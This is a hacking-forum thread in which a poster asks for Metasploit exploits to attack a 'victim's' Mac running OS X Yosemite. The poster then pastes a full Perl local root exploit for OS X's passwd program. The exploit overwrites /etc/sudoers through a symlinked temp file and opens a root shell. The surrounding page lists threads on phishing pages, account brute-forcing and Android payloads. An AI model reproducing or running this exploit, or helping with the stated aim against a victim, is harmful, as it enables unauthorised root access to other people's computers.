Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
Hello Guys I Am Just a Begineer in Hacking,Vpn,Proxies and Many Others but I Am Confused That Does Website Proxies Hide
9
Replies
2 hrs ago -
Forum Thread:
Hack Instagram Account Using BruteForce
196
Replies
11 hrs ago -
Forum Thread:
How to Hack a Website to Edit It
19
Replies
11 hrs ago -
Forum Thread:
Android Doesn't Connect Back to Metasploit with App Payload?
18
Replies
1 day ago -
Forum Thread:
Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce
156
Replies
1 day ago -
Forum Thread:
Kali Linux WiFi Problem?
41
Replies
2 days ago -
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
173
Replies
3 days ago -
Forum Thread:
How to Start Listening Connections on Metaslpoit (WINDOWS)
8
Replies
4 days ago -
Forum Thread:
Grab Target's Webcam by Link
4
Replies
4 days ago -
How to:
HACK Android Device with TermuX on Android | Part #2 - Over WLAN Hotspot [Ultimate Guide]
24
Replies
5 days ago -
Forum Thread:
Complete Guide to Creating and Hosting a Phishing Page for Beginners
41
Replies
1 wk ago -
Forum Thread:
No Wireless Extensions in Linux Debian
3
Replies
1 wk ago -
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
6
Replies
1 wk ago -
Forum Thread:
Bruteforce Password Cracker (ghoster_brute)
6
Replies
2 wks ago -
Forum Thread:
Txpower Adjustment?
17
Replies
2 wks ago -
Forum Thread:
How to Controll Multiple Devices Using a Meterpreter ?
4
Replies
2 wks ago -
Forum Thread:
Delete Infected Apk from Victim Phone Remotely
1
Replies
2 wks ago -
How to:
Install Metasploit Framework on Android | Part #1 - in TermuX
81
Replies
2 wks ago -
Forum Thread:
The Most Anonymous Reconnaissance Technique?
1
Replies
2 wks ago -
Forum Thread:
Tp-Link wn8200nd
2
Replies
3 wks ago
-
How To:
Perform Keystroke Injection Attacks Over Wi-Fi with Your Smartphone
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Hack Android Using Kali (Remotely)
-
How To:
Crack Password-Protected ZIP Files, PDFs & More with Zydra
-
How To:
Phish for Social Media & Other Account Passwords with BlackEye
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To:
Hunt Down Social Media Accounts by Usernames with Sherlock
-
How To:
Spy on Traffic from a Smartphone with Wireshark
-
How To:
Networking Basics for the Aspiring Hacker
-
How To:
Hack Wi-Fi Networks with Bettercap
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts